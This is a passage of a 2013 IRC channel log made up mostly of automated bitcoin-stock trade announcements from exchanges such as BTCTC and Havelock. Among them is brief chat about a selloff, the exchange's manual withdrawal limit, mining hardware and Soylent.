0.005902 = 0.2951 BTC [-] Aug 07 02:41:18 [BTCTC] [ACTIVEMINING] 2 @ 0.0059 = 0.0118 BTC [-] Aug 07 02:41:19 [BTCTC] [ACTIVEMINING] 20 @ 0.005892 = 0.1178 BTC [-] Aug 07 02:41:20 [BTCTC] [ACTIVEMINING] 4 @ 0.005891 = 0.0236 BTC [-] Aug 07 02:41:20 woat Aug 07 02:41:21 [BTCTC] [DMS.MINING] 11 @ 0.006615 = 0.0728 BTC [+] Aug 07 02:41:22 [BTCTC] [ACTIVEMINING] 100 @ 0.00589 = 0.589 BTC [-] Aug 07 02:41:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005863 BTC [-] Aug 07 02:41:23 why? Aug 07 02:41:24 [BTCTC] [ACTIVEMINING] 5 @ 0.005862 = 0.0293 BTC [-] Aug 07 02:41:25 [BTCTC] [ACTIVEMINING] 21 @ 0.005856 = 0.123 BTC [-] Aug 07 02:41:26 [BTCTC] [ACTIVEMINING] 108 @ 0.005855 = 0.6323 BTC [-] Aug 07 02:41:27 [BTCTC] [ACTIVEMINING] 314 @ 0.005832 = 1.8312 BTC [-] Aug 07 02:41:28 [BTCTC] [ACTIVEMINING] 1540 @ 0.005831 = 8.9797 BTC [-] Aug 07 02:41:29 [BTCTC] [ACTIVEMINING] 30 @ 0.00583 = 0.1749 BTC [-] Aug 07 02:41:30 [BTCTC] [ACTIVEMINING] 20 @ 0.005801 = 0.116 BTC [-] Aug 07 02:41:31 [BTCTC] [ACTIVEMINING] 100 @ 0.0058 = 0.58 BTC [-] Aug 07 02:41:32 [BTCTC] [ACTIVEMINING] 90 @ 0.005774 = 0.5197 BTC [-] Aug 07 02:41:33 [BTCTC] [ACTIVEMINING] 450 @ 0.005773 = 2.5979 BTC [-] Aug 07 02:41:34 [BTCTC] [ACTIVEMINING] 38 @ 0.005751 = 0.2185 BTC [-] Aug 07 02:41:35 [BTCTC] [ACTIVEMINING] 194 @ 0.00575 = 1.1155 BTC [-] Aug 07 02:41:36 [BTCTC] [ACTIVEMINING] 84 @ 0.005611 = 0.4713 BTC [-] Aug 07 02:41:41 what happend? Aug 07 02:41:46 possible hack, person doesn't realize they can't withdraw? Aug 07 02:41:56 i mean ??? Aug 07 02:42:16 [BTCTC] [DMS.MINING] 15 @ 0.00664 = 0.0996 BTC [+] Aug 07 02:42:55 small selloff what's the big deal? Aug 07 02:43:28 Whoah. Aug 07 02:44:27 [HAVELOCK] [SDSTM] 4 @ 0.00560011 = 0.0224 BTC [-] Aug 07 02:44:46 [MPEX] [S.MPOE] 23600 @ 0.00082858 = 19.5545 BTC [-] Aug 07 02:45:08 fine. you tell my kids they can't go to college. Aug 07 02:46:26 [HAVELOCK] [XBOND] 22 @ 0.001039 = 0.0229 BTC [+] Aug 07 02:46:46 you cant withdraw from BTCTCO??? Aug 07 02:48:09 [BTCTC] [LABCOIN] 10 @ 0.001537 = 0.0154 BTC [+] Aug 07 02:48:11 [BTCTC] [LABCOIN] 235 @ 0.001536 = 0.361 BTC [-] Aug 07 02:48:12 [BTCTC] [LABCOIN] 635 @ 0.0015 = 0.9525 BTC [-] Aug 07 02:48:13 [BTCTC] [LABCOIN] 120 @ 0.0015 = 0.18 BTC [-] Aug 07 02:48:15 [BTCTC] [TAT.ASICMINER] 6 @ 0.0403 = 0.2418 BTC [+] Aug 07 02:49:56 thestringpuller: i meant if someone was doing some sort of hack and selling a ton of stock in order to withdraw, that'd likely get stifled by the manual withdraw threshold Aug 07 02:50:35 what is the threshold?!?!?!? Aug 07 02:51:18 a few btc i think Aug 07 02:51:30 it varies based on something Aug 07 02:51:36 mtgoxusd maybe Aug 07 02:51:45 [HAVELOCK] [XBOND] 3229 @ 0.001039 = 3.3549 BTC [+] Aug 07 02:52:32 [BTCTC] [BTCGARDEN] 25 @ 0.01573 = 0.3933 BTC [-] Aug 07 02:52:34 sl how do you get your money out? Aug 07 02:52:43 this sounds shady aas fuuuck Aug 07 02:53:37 there is a daily limit, that's all… Aug 07 02:53:56 [BTCTC] [BASIC-MINING] 2 @ 0.4 = 0.8 BTC [-] Aug 07 02:54:26 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.0025 = 0.1 BTC [-] Aug 07 02:54:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.04059 = 0.0812 BTC [+] Aug 07 02:55:10 [BTCTC] [BTCGARDEN] 3 @ 0.01573 = 0.0472 BTC [-] Aug 07 02:55:12 [BTCTC] [BTCGARDEN] 22 @ 0.01572 = 0.3458 BTC [-] Aug 07 02:56:04 [BTCTC] [LABCOIN] 50 @ 0.001538 = 0.0769 BTC [+] Aug 07 02:57:02 thestringpuller: you can withdraw as much as you want but only so many coins will go out immediately Aug 07 02:57:13 the rest will wait until burnside ok's it Aug 07 02:57:16 i think Aug 07 02:57:18 [BTCTC] [LABCOIN] 50 @ 0.001535 = 0.0768 BTC [-] Aug 07 02:57:19 [BTCTC] [LABCOIN] 29 @ 0.001536 = 0.0445 BTC [+] Aug 07 02:57:29 but they've always gone out within 24 hours for me Aug 07 02:58:21 [HAVELOCK] [XBOND] 1771 @ 0.001039 = 1.8401 BTC [+] Aug 07 02:58:23 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 07 02:58:47 i think it's a good thing to have some human intervention in certain cases Aug 07 03:00:02 [BTCTC] [LABCOIN] 10 @ 0.00159 = 0.0159 BTC [+] Aug 07 03:00:03 [BTCTC] [LABCOIN] 16 @ 0.001591 = 0.0255 BTC [+] Aug 07 03:01:06 thestringpuller, last i checked the limit was 6.x btc Aug 07 03:01:33 after that burnside has to make the exchange manually, i guess most funds are cold storage Aug 07 03:01:44 [BTCTC] [TAT.MINIGAME] 2 @ 0.0002249 = 0.0004 BTC [-] Aug 07 03:02:07 [BTCTC] [LABCOIN] 235 @ 0.001586 = 0.3727 BTC [-] Aug 07 03:04:24 [BTCTC] [ACTIVEMINING] 68 @ 0.006054 = 0.4117 BTC [+] Aug 07 03:05:23 [BTCTC] [BTCGARDEN] 161 @ 0.01599 = 2.5744 BTC [+] Aug 07 03:05:23 [BTCTC] [BTCGARDEN] 1290 @ 0.016 = 20.64 BTC [+] Aug 07 03:06:14 afrotec: thanks for explaining! Aug 07 03:06:58 no problemo **** ENDING LOGGING AT Wed Aug 7 03:26:37 2013 **** BEGIN LOGGING AT Wed Aug 7 03:27:02 2013 Aug 07 03:27:05 or is icebreaker just gonna send the 20K btc and expect a delivery of 1720 units ready to go within 2-4 months? Aug 07 03:27:17 i think it's a good thing to have some human intervention in certain cases << definitel Aug 07 03:27:36 err 1250 units worth $1720 a piece Aug 07 03:27:38 [BTCTC] [BTCGARDEN] 49 @ 0.01601 = 0.7845 BTC [+] Aug 07 03:27:54 hashfast? Aug 07 03:28:47 http://hashfast.com/ Aug 07 03:29:08 [BTCTC] [LABCOIN] 6 @ 0.001531 = 0.0092 BTC [-] Aug 07 03:30:03 [BTCTC] [BTCGARDEN] 3 @ 0.01581 = 0.0474 BTC [-] Aug 07 03:30:11 yeah thats what i thought, you said fasthash initally Aug 07 03:30:25 oh, sry lol Aug 07 03:30:33 lol Aug 07 03:30:40 [BTCTC] [BTCGARDEN] 28 @ 0.01573 = 0.4404 BTC [-] Aug 07 03:30:42 [BTCTC] [BTCGARDEN] 19 @ 0.01572 = 0.2987 BTC [-] Aug 07 03:30:48 *puts down the hashpipe* Aug 07 03:33:29 [MPEX] [S.MPOE] 6050 @ 0.0008271 = 5.004 BTC [-] Aug 07 03:35:47 [BTCTC] [LABCOIN] 50 @ 0.001523 = 0.0762 BTC [-] Aug 07 03:35:48 [BTCTC] [LABCOIN] 235 @ 0.001522 = 0.3577 BTC [-] Aug 07 03:35:49 [BTCTC] [LABCOIN] 3 @ 0.001514 = 0.0045 BTC [-] Aug 07 03:35:51 [BTCTC] [LABCOIN] 25 @ 0.001513 = 0.0378 BTC [-] Aug 07 03:35:52 [BTCTC] [LABCOIN] 525 @ 0.001503 = 0.7891 BTC [-] Aug 07 03:35:52 [BTCTC] [LABCOIN] 1662 @ 0.001502 = 2.4963 BTC [-] Aug 07 03:38:47 [HAVELOCK] [SMG] 2 @ 0.000214 = 0.0004 BTC [-] Aug 07 03:39:13 [BTCTC] [LABCOIN] 52 @ 0.001542 = 0.0802 BTC [+] Aug 07 03:39:16 [BTCTC] [ASICMINER-PT] 1 @ 3.99 BTC [-] Aug 07 03:39:55 [BTCTC] [ACTIVEMINING] 15 @ 0.005509 = 0.0826 BTC [+] Aug 07 03:41:49 [BTCTC] [ACTIVEMINING] 20 @ 0.005511 = 0.1102 BTC [+] Aug 07 03:49:09 [BTCTC] [ACTIVEMINING] 51 @ 0.005521 = 0.2816 BTC [+] Aug 07 03:49:11 [BTCTC] [ACTIVEMINING] 13 @ 0.00552 = 0.0718 BTC [-] Aug 07 03:49:12 [BTCTC] [ACTIVEMINING] 372 @ 0.005504 = 2.0475 BTC [-] Aug 07 03:49:13 [BTCTC] [ACTIVEMINING] 602 @ 0.005501 = 3.3116 BTC [-] Aug 07 03:49:15 [BTCTC] [ACTIVEMINING] 2250 @ 0.0055 = 12.375 BTC [-] Aug 07 03:49:16 [BTCTC] [ACTIVEMINING] 200 @ 0.0055 = 1.1 BTC [-] Aug 07 03:49:17 [BTCTC] [ACTIVEMINING] 50 @ 0.0055 = 0.275 BTC [-] Aug 07 03:49:17 [BTCTC] [ACTIVEMINING] 500 @ 0.0055 = 2.75 BTC [-] Aug 07 03:49:26 [BTCTC] [ACTIVEMINING] 16 @ 0.0055 = 0.088 BTC [-] Aug 07 03:50:49 [BTCTC] [ACTIVEMINING] 2 @ 0.005932 = 0.0119 BTC [+] Aug 07 03:51:13 [BTCTC] [ACTIVEMINING] 10 @ 0.005499 = 0.055 BTC [-] Aug 07 03:51:15 [BTCTC] [ACTIVEMINING] 2 @ 0.0054 = 0.0108 BTC [-] Aug 07 03:51:16 [BTCTC] [ACTIVEMINING] 120 @ 0.005391 = 0.6469 BTC [-] Aug 07 03:51:18 [BTCTC] [ACTIVEMINING] 600 @ 0.00539 = 3.234 BTC [-] Aug 07 03:51:19 [BTCTC] [ACTIVEMINING] 268 @ 0.00536 = 1.4365 BTC [-] Aug 07 03:52:14 [MPEX] [S.MPOE] 4300 @ 0.00082858 = 3.5629 BTC [+] Aug 07 03:52:56 [HAVELOCK] [HIM] 1 @ 0.135 BTC [-] Aug 07 03:52:58 [HAVELOCK] [HIM] 38 @ 0.134 = 5.092 BTC [-] Aug 07 03:53:19 [HAVELOCK] [SMG] 98 @ 0.000214 = 0.021 BTC [-] Aug 07 03:55:05 [BTCTC] [BASIC-MINING] 2 @ 0.397 = 0.794 BTC [-] Aug 07 03:55:05 [BTCTC] [BASIC-MINING] 1 @ 0.396 BTC [-] Aug 07 03:55:07 [BTCTC] [BASIC-MINING] 1 @ 0.3911 BTC [-] Aug 07 03:55:08 [BTCTC] [BASIC-MINING] 5 @ 0.391 = 1.955 BTC [-] Aug 07 03:55:09 [BTCTC] [BASIC-MINING] 1 @ 0.3886 BTC [-] Aug 07 03:55:11 [BTCTC] [BASIC-MINING] 12 @ 0.3885 = 4.662 BTC [-] Aug 07 03:55:12 [BTCTC] [BASIC-MINING] 1 @ 0.387 BTC [-] Aug 07 03:55:14 [BTCTC] [BASIC-MINING] 7 @ 0.385 = 2.695 BTC [-] Aug 07 03:55:15 [BTCTC] [BASIC-MINING] 5 @ 0.3751 = 1.8755 BTC [-] Aug 07 03:55:16 [BTCTC] [BASIC-MINING] 13 @ 0.375 = 4.875 BTC [-] Aug 07 03:58:26 [BTCTC] [BTCGARDEN] 25 @ 0.01598 = 0.3995 BTC [+] Aug 07 04:00:02 [HAVELOCK] [SDSTM] 1 @ 0.00560011 BTC [-] Aug 07 04:06:54 [BTCTC] [ACTIVEMINING] 2 @ 0.005411 = 0.0108 BTC [+] Aug 07 04:06:55 [BTCTC] [ACTIVEMINING] 6 @ 0.005411 = 0.0325 BTC [+] Aug 07 04:06:57 [BTCTC] [ACTIVEMINING] 32 @ 0.00541 = 0.1731 BTC [-] Aug 07 04:06:58 [BTCTC] [ACTIVEMINING] 2 @ 0.005404 = 0.0108 BTC [-] Aug 07 04:06:59 [BTCTC] [ACTIVEMINING] 14 @ 0.005403 = 0.0756 BTC [-] Aug 07 04:07:04 [BTCTC] [ACTIVEMINING] 20 @ 0.005371 = 0.1074 BTC [-] Aug 07 04:07:06 [BTCTC] [ACTIVEMINING] 100 @ 0.00537 = 0.537 BTC [-] Aug 07 04:07:07 [BTCTC] [ACTIVEMINING] 146 @ 0.005361 = 0.7827 BTC [-] Aug 07 04:07:08 [BTCTC] [ACTIVEMINING] 732 @ 0.00536 = 3.9235 BTC [-] Aug 07 04:07:09 [BTCTC] [ACTIVEMINING] 400 @ 0.005354 = 2.1416 BTC [-] Aug 07 04:07:10 [BTCTC] [ACTIVEMINING] 1000 @ 0.005353 = 5.353 BTC [-] Aug 07 04:07:11 [BTCTC] [ACTIVEMINING] 1000 @ 0.005352 = 5.352 BTC [-] Aug 07 04:08:40 [HAVELOCK] [XBOND] 71 @ 0.0010302 = 0.0731 BTC [-] Aug 07 04:08:54 [BTCTC] [BASIC-MINING] 10 @ 0.375 = 3.75 BTC [-] Aug 07 04:09:07 [BTCTC] [ACTIVEMINING] 1 @ 0.005352 BTC [-] Aug 07 04:09:23 [HAVELOCK] [XBOND] 309 @ 0.0010301 = 0.3183 BTC [-] Aug 07 04:10:13 [BTCTC] [LABCOIN] 12 @ 0.001531 = 0.0184 BTC [-] Aug 07 04:11:51 [HAVELOCK] [XBOND] 1 @ 0.00103986 BTC [+] Aug 07 04:13:54 [HAVELOCK] [AM100] 1 @ 0.0397 BTC [+] Aug 07 04:13:56 [HAVELOCK] [AM100] 10 @ 0.0398 = 0.398 BTC [+] Aug 07 04:13:59 [HAVELOCK] [AM100] 99 @ 0.0398999 = 3.9501 BTC [+] Aug 07 04:14:13 [BTCTC] [BTCGARDEN] 31 @ 0.01598 = 0.4954 BTC [+] Aug 07 04:14:14 [BTCTC] [BTCGARDEN] 55 @ 0.01573 = 0.8652 BTC [-] Aug 07 04:14:15 [BTCTC] [BTCGARDEN] 100 @ 0.01572 = 1.572 BTC [-] Aug 07 04:14:16 [BTCTC] [BTCGARDEN] 60 @ 0.0157 = 0.942 BTC [-] Aug 07 04:14:17 [BTCTC] [BTCGARDEN] 64 @ 0.01563 = 1.0003 BTC [-] Aug 07 04:14:19 [BTCTC] [BTCGARDEN] 9 @ 0.01561 = 0.1405 BTC [-] Aug 07 04:14:20 [BTCTC] [BTCGARDEN] 104 @ 0.01557 = 1.6193 BTC [-] Aug 07 04:14:21 [BTCTC] [BTCGARDEN] 77 @ 0.01551 = 1.1943 BTC [-] Aug 07 04:15:51 [BTCTC] [BASIC-MINING] 2 @ 0.3735 = 0.747 BTC [-] Aug 07 04:15:53 [BTCTC] [BASIC-MINING] 3 @ 0.3735 = 1.1205 BTC [-] Aug 07 04:15:55 [BTCTC] [BASIC-MINING] 3 @ 0.3729 = 1.1187 BTC [-] Aug 07 04:15:56 [BTCTC] [BASIC-MINING] 1 @ 0.37 BTC [-] Aug 07 04:15:57 [BTCTC] [BASIC-MINING] 12 @ 0.36 = 4.32 BTC [-] Aug 07 04:15:58 [BTCTC] [BASIC-MINING] 2 @ 0.3512 = 0.7024 BTC [-] Aug 07 04:15:59 [BTCTC] [BASIC-MINING] 1 @ 0.3502 BTC [-] Aug 07 04:16:00 [BTCTC] [BASIC-MINING] 2 @ 0.3502 = 0.7004 BTC [-] Aug 07 04:16:01 [BTCTC] [BASIC-MINING] 29 @ 0.3501 = 10.1529 BTC [-] Aug 07 04:16:03 [BTCTC] [BASIC-MINING] 4 @ 0.35 = 1.4 BTC [-] Aug 07 04:16:19 [BTCTC] [DMS.MINING] 10 @ 0.00627 = 0.0627 BTC [-] Aug 07 04:20:35 [HAVELOCK] [AM100] 63 @ 0.0398999 = 2.5137 BTC [+] Aug 07 04:20:44 [HAVELOCK] [AM100] 299 @ 0.0399 = 11.9301 BTC [+] Aug 07 04:21:00 [HAVELOCK] [AM100] 5 @ 0.0399998 = 0.2 BTC [+] Aug 07 04:21:54 [BTCTC] [LABCOIN] 25 @ 0.00152 = 0.038 BTC [-] Aug 07 04:21:55 [BTCTC] [LABCOIN] 1 @ 0.001521 BTC [+] Aug 07 04:22:29 [BTCTC] [LABCOIN] 10 @ 0.001521 = 0.0152 BTC [+] Aug 07 04:26:31 [BTCTC] [ACTIVEMINING] 24 @ 0.005588 = 0.1341 BTC [+] Aug 07 04:26:32 [BTCTC] [ACTIVEMINING] 44 @ 0.005589 = 0.2459 BTC [+] Aug 07 04:26:46 [BTCTC] [LABCOIN] 413 @ 0.001553 = 0.6414 BTC [+] Aug 07 04:26:47 [BTCTC] [LABCOIN] 10 @ 0.001553 = 0.0155 BTC [+] Aug 07 04:26:48 [BTCTC] [LABCOIN] 7 @ 0.001554 = 0.0109 BTC [+] Aug 07 04:26:50 [BTCTC] [ACTIVEMINING] 24 @ 0.005589 = 0.1341 BTC [+] Aug 07 04:33:54 [BTCTC] [TAT.ASICMINER] 50 @ 0.0403 = 2.015 BTC [-] Aug 07 04:37:45 [BTCTC] [ACTIVEMINING] 8 @ 0.005699 = 0.0456 BTC [+] Aug 07 04:49:11 [BTCTC] [ACTIVEMINING] 20 @ 0.005823 = 0.1165 BTC [+] Aug 07 04:51:14 [BTCTC] [ACTIVEMINING] 68 @ 0.005819 = 0.3957 BTC [-] Aug 07 04:53:17 whats the die size on the hashfast chips Aug 07 04:54:23 [BTCTC] [LABCOIN] 235 @ 0.001538 = 0.3614 BTC [-] Aug 07 04:57:33 [BTCTC] [BTCGARDEN] 28 @ 0.01558 = 0.4362 BTC [+] Aug 07 04:58:40 [BTCTC] [BTCGARDEN] 35 @ 0.01557 = 0.545 BTC [-] Aug 07 04:59:12 [HAVELOCK] [XBOND] 10 @ 0.00103986 = 0.0104 BTC [+] Aug 07 04:59:50 [BTCTC] [LABCOIN] 50 @ 0.001524 = 0.0762 BTC [-] Aug 07 05:09:28 [BTCTC] [BTCGARDEN] 1 @ 0.01587 BTC [+] Aug 07 05:09:29 [BTCTC] [BTCGARDEN] 9 @ 0.01588 = 0.1429 BTC [+] Aug 07 05:09:30 [BTCTC] [BTCGARDEN] 1 @ 0.01595 BTC [+] Aug 07 05:09:31 [BTCTC] [BTCGARDEN] 10 @ 0.01596 = 0.1596 BTC [+] Aug 07 05:10:21 [BTCTC] [BTCGARDEN] 3 @ 0.01596 = 0.0479 BTC [+] Aug 07 05:10:22 [BTCTC] [BTCGARDEN] 66 @ 0.01557 = 1.0276 BTC [-] Aug 07 05:10:23 [BTCTC] [BTCGARDEN] 32 @ 0.01555 = 0.4976 BTC [-] Aug 07 05:10:24 [BTCTC] [BTCGARDEN] 80 @ 0.01554 = 1.2432 BTC [-] Aug 07 05:10:25 [BTCTC] [BTCGARDEN] 105 @ 0.01553 = 1.6307 BTC [-] Aug 07 05:10:27 [BTCTC] [BTCGARDEN] 784 @ 0.01551 = 12.1598 BTC [-] Aug 07 05:10:28 [BTCTC] [BTCGARDEN] 47 @ 0.0155 = 0.7285 BTC [-] Aug 07 05:11:56 [BTCTC] [S.MPOE-PT] 1 @ 0.0009986 BTC [+] Aug 07 05:12:58 [MPEX] [S.MPOE] 4000 @ 0.00082758 = 3.3103 BTC [-] Aug 07 05:13:00 [MPEX] [S.MPOE] 1200 @ 0.0008271 = 0.9925 BTC [-] Aug 07 05:13:04 [MPEX] [S.MPOE] 600 @ 0.00082682 = 0.4961 BTC [-] Aug 07 05:16:46 [BTCTC] [BTCGARDEN] 25 @ 0.01553 = 0.3883 BTC [+] Aug 07 05:16:47 [BTCTC] [BTCGARDEN] 95 @ 0.01551 = 1.4735 BTC [-] Aug 07 05:18:59 [BTCTC] [BTCGARDEN] 3 @ 0.01589 = 0.0477 BTC [+] Aug 07 05:19:00 [BTCTC] [BTCGARDEN] 28 @ 0.0159 = 0.4452 BTC [+] Aug 07 05:21:21 [HAVELOCK] [SMG] 93 @ 0.00023979 = 0.0223 BTC [+] Aug 07 05:22:33 [BTCTC] [BTCGARDEN] 9 @ 0.01552 = 0.1397 BTC [-] Aug 07 05:22:34 [BTCTC] [BTCGARDEN] 296 @ 0.01552 = 4.5939 BTC [-] Aug 07 05:22:49 [BTCTC] [LABCOIN] 205 @ 0.001518 = 0.3112 BTC [-] Aug 07 05:22:50 [BTCTC] [LABCOIN] 3293 @ 0.001519 = 5.0021 BTC [+] Aug 07 05:22:51 [BTCTC] [LABCOIN] 143 @ 0.001523 = 0.2178 BTC [+] Aug 07 05:22:53 [BTCTC] [LABCOIN] 2297 @ 0.001524 = 3.5006 BTC [+] Aug 07 05:23:02 [BTCTC] [ASICMINER-PT] 3 @ 3.966 = 11.898 BTC [-] Aug 07 05:23:35 [HAVELOCK] [XBOND] 41 @ 0.00103011 = 0.0422 BTC [-] Aug 07 05:23:43 [HAVELOCK] [XBOND] 268 @ 0.0010301 = 0.2761 BTC [-] Aug 07 05:24:56 [HAVELOCK] [XBOND] 600 @ 0.00103001 = 0.618 BTC [-] Aug 07 05:25:16 [BTCTC] [BTCGARDEN] 1 @ 0.01593 BTC [+] Aug 07 05:25:39 [BTCTC] [BTCGARDEN] 27 @ 0.01593 = 0.4301 BTC [+] Aug 07 05:25:40 [BTCTC] [BTCGARDEN] 4 @ 0.01594 = 0.0638 BTC [+] Aug 07 05:25:41 [BTCTC] [BTCGARDEN] 9 @ 0.01595 = 0.1436 BTC [+] Aug 07 05:25:43 [BTCTC] [BTCGARDEN] 28 @ 0.01599 = 0.4477 BTC [+] Aug 07 05:25:52 [BTCTC] [ACTIVEMINING] 10 @ 0.005776 = 0.0578 BTC [-] Aug 07 05:25:53 [BTCTC] [ACTIVEMINING] 50 @ 0.005777 = 0.2889 BTC [+] Aug 07 05:25:55 [BTCTC] [ACTIVEMINING] 290 @ 0.005862 = 1.7 BTC [+] Aug 07 05:25:56 [BTCTC] [ACTIVEMINING] 1 @ 0.005863 BTC [+] Aug 07 05:26:02 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [+] Aug 07 05:27:22 [BTCTC] [BTCGARDEN] 10 @ 0.01597 = 0.1597 BTC [-] Aug 07 05:28:49 [BTCTC] [ACTIVEMINING] 45 @ 0.005865 = 0.2639 BTC [+] Aug 07 05:29:25 [HAVELOCK] [XBOND] 8152 @ 0.00103 = 8.3966 BTC [-] Aug 07 05:29:28 [HAVELOCK] [XBOND] 12348 @ 0.00103 = 12.7184 BTC [-] Aug 07 05:29:42 [HAVELOCK] [XBOND] 152 @ 0.00103 = 0.1566 BTC [-] Aug 07 05:32:07 [BTCTC] [ACTIVEMINING] 68 @ 0.005864 = 0.3988 BTC [-] Aug 07 05:32:08 [BTCTC] [ACTIVEMINING] 231 @ 0.005865 = 1.3548 BTC [+] Aug 07 05:32:09 [BTCTC] [ACTIVEMINING] 291 @ 0.005866 = 1.707 BTC [+] Aug 07 05:32:40 [BTCTC] [BTCGARDEN] 8 @ 0.01593 = 0.1274 BTC [-] Aug 07 05:32:56 [BTCTC] [ACTIVEMINING] 8 @ 0.005864 = 0.0469 BTC [-] Aug 07 05:33:23 [BTCTC] [ACTIVEMINING] 60 @ 0.005863 = 0.3518 BTC [-] Aug 07 05:33:26 [HAVELOCK] [XBOND] 95 @ 0.00103985 = 0.0988 BTC [+] Aug 07 05:33:44 [BTCTC] [BTCGARDEN] 10 @ 0.01591 = 0.1591 BTC [-] Aug 07 05:33:46 [BTCTC] [BTCGARDEN] 1 @ 0.01592 BTC [+] Aug 07 05:33:47 [BTCTC] [BTCGARDEN] 11 @ 0.01599 = 0.1759 BTC [+] Aug 07 05:33:54 [HAVELOCK] [XBOND] 1 @ 0.00103985 BTC [+] Aug 07 05:33:56 [BTCTC] [ACTIVEMINING] 1 @ 0.005864 BTC [+] Aug 07 05:36:34 [BTCTC] [S.BBET-PT] 100 @ 0.002 = 0.2 BTC [+] Aug 07 05:39:21 [BTCTC] [BTCGARDEN] 11 @ 0.01599 = 0.1759 BTC [+] Aug 07 05:41:48 [BTCTC] [TAT.ASICMINER] 11 @ 0.0403 = 0.4433 BTC [-] Aug 07 05:43:56 [BTCTC] [LABCOIN] 19 @ 0.00154 = 0.0293 BTC [+] Aug 07 05:48:55 [BTCTC] [LABCOIN] 25 @ 0.001533 = 0.0383 BTC [-] Aug 07 05:48:56 [BTCTC] [LABCOIN] 144 @ 0.001534 = 0.2209 BTC [+] Aug 07 05:48:58 [BTCTC] [LABCOIN] 1 @ 0.001534 BTC [+] Aug 07 05:48:59 [BTCTC] [LABCOIN] 6 @ 0.001549 = 0.0093 BTC [+] Aug 07 05:49:00 [BTCTC] [LABCOIN] 50 @ 0.00155 = 0.0775 BTC [+] Aug 07 05:49:00 [BTCTC] [LABCOIN] 5 @ 0.001586 = 0.0079 BTC [+] Aug 07 05:49:01 [BTCTC] [LABCOIN] 41 @ 0.001587 = 0.0651 BTC [+] Aug 07 05:49:02 [BTCTC] [LABCOIN] 368 @ 0.001588 = 0.5844 BTC [+] Aug 07 05:49:21 [HAVELOCK] [SDSTM] 1 @ 0.00560011 BTC [-] Aug 07 05:51:33 [BTCTC] [BTCGARDEN] 28 @ 0.01556 = 0.4357 BTC [-] Aug 07 05:52:39 [BTCTC] [BTCGARDEN] 311 @ 0.01556 = 4.8392 BTC [-] Aug 07 05:52:41 [BTCTC] [BTCGARDEN] 36 @ 0.01597 = 0.5749 BTC [+] Aug 07 05:52:42 [BTCTC] [BTCGARDEN] 253 @ 0.01598 = 4.0429 BTC [+] Aug 07 05:52:55 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002599 BTC [+] Aug 07 05:53:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.0404 = 0.2424 BTC [+] Aug 07 05:54:01 http://blog.soylent.me/post/57550580385/just-as-soylent-is-disrupting-the-traditional-food Aug 07 05:54:56 [BTCTC] [S.MPOE-PT] 1 @ 0.0008607 BTC [-] Aug 07 05:58:12 [BTCTC] [COGNITIVE] 2 @ 0.3901 = 0.7802 BTC [-] Aug 07 05:59:50 [BTCTC] [ACTIVEMINING] 15 @ 0.005883 = 0.0882 BTC [+] Aug 07 06:00:34 [BTCTC] [BTCGARDEN] 28 @ 0.01589 = 0.4449 BTC [-] Aug 07 06:00:36 [BTCTC] [BTCGARDEN] 3 @ 0.0159 = 0.0477 BTC [+] Aug 07 06:00:37 [BTCTC] [BTCGARDEN] 10 @ 0.01594 = 0.1594 BTC [+] Aug 07 06:00:38 [BTCTC] [BTCGARDEN] 59 @ 0.01595 = 0.9411 BTC [+] Aug 07 06:03:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0404 BTC [+] Aug 07 06:08:29 who would pay good bitcoin for that soylent slop lol! Aug 07 06:09:03 now if the steakhouse stats accepting bitcoin, count me in Aug 07 06:13:04 [BTCTC] [TAT.MINIGAME] 3 @ 0.00023 = 0.0007 BTC [+] Aug 07 06:16:39 [BTCTC] [BASIC-MINING] 1 @ 0.39 BTC [+] Aug 07 06:19:33 [BTCTC] [ACTIVEMINING] 1 @ 0.005863 BTC [-] Aug 07 06:19:34 [BTCTC] [ACTIVEMINING] 5 @ 0.00575 = 0.0288 BTC [-] Aug 07 06:20:52 [BTCTC] [BITVPS] 15 @ 0.002048 = 0.0307 BTC [-] Aug 07 06:22:05 [BTCTC] [BITVPS] 2 @ 0.002047 = 0.0041 BTC [-] Aug 07 06:23:45 !ticker btctc dms.selling Aug 07 06:23:47 [BTCT:DMS.SELLING] 1D: 0.02176 / 0.02301 / 0.02399 (2052 shares, 47.2 BTC), 7D: 0.0201 / 0.02253 / 0.0264 (17553 shares, 395.4 BTC), 30D: 0.0176 / 0.02402 / 0.035716 (59598 shares, 1431.8 BTC) Aug 07 06:25:49 [BTCTC] [BTC-BOND] 5 @ 0.009999 = 0.05 BTC [+] Aug 07 06:31:22 [BTCTC] [LABCOIN] 50 @ 0.001563 = 0.0782 BTC [-] Aug 07 06:31:24 [BTCTC] [LABCOIN] 150 @ 0.00156 = 0.234 BTC [-] Aug 07 06:32:43 [BTCTC] [ASICMINER-PT] 1 @ 3.934 BTC [-] Aug 07 06:32:44 [BTCTC] [ASICMINER-PT] 1 @ 3.933 BTC [-] Aug 07 06:32:44 [BTCTC] [ASICMINER-PT] 1 @ 3.93 BTC [-] Aug 07 06:32:46 [BTCTC] [ASICMINER-PT] 1 @ 3.93 BTC [-] Aug 07 06:36:59 [BTCTC] [S.MPOE-PT] 50 @ 0.0008607 = 0.043 BTC [-] Aug 07 06:37:00 [BTCTC] [S.MPOE-PT] 12 @ 0.0008606 = 0.0103 BTC [-] Aug 07 06:37:02 [BTCTC] [S.MPOE-PT] 12 @ 0.0008606 = 0.0103 BTC [-] Aug 07 06:37:03 [BTCTC] [S.MPOE-PT] 12 @ 0.0008606 = 0.0103 BTC [-] Aug 07 06:37:04 [BTCTC] [S.MPOE-PT] 114 @ 0.0008601 = 0.0981 BTC [-] Aug 07 06:37:23 [BTCTC] [TAT.ASICMINER] 3 @ 0.0404 = 0.1212 BTC [+] Aug 07 06:37:35 kerb derb merb Aug 07 06:37:48 !ticker btctc dms.selling Aug 07 06:37:50 [BTCT:DMS.SELLING] 1D: 0.02176 / 0.02301 / 0.02399 (2052 shares, 47.2 BTC), 7D: 0.0201 / 0.02253 / 0.0264 (17553 shares, 395.4 BTC), 30D: 0.0176 / 0.02401 / 0.035716 (59531 shares, 1429.6 BTC) Aug 07 06:39:50 [BTCTC] [BTCGARDEN] 28 @ 0.01558 = 0.4362 BTC [-] Aug 07 06:39:52 [BTCTC] [BTCGARDEN] 40 @ 0.01557 = 0.6228 BTC [-] Aug 07 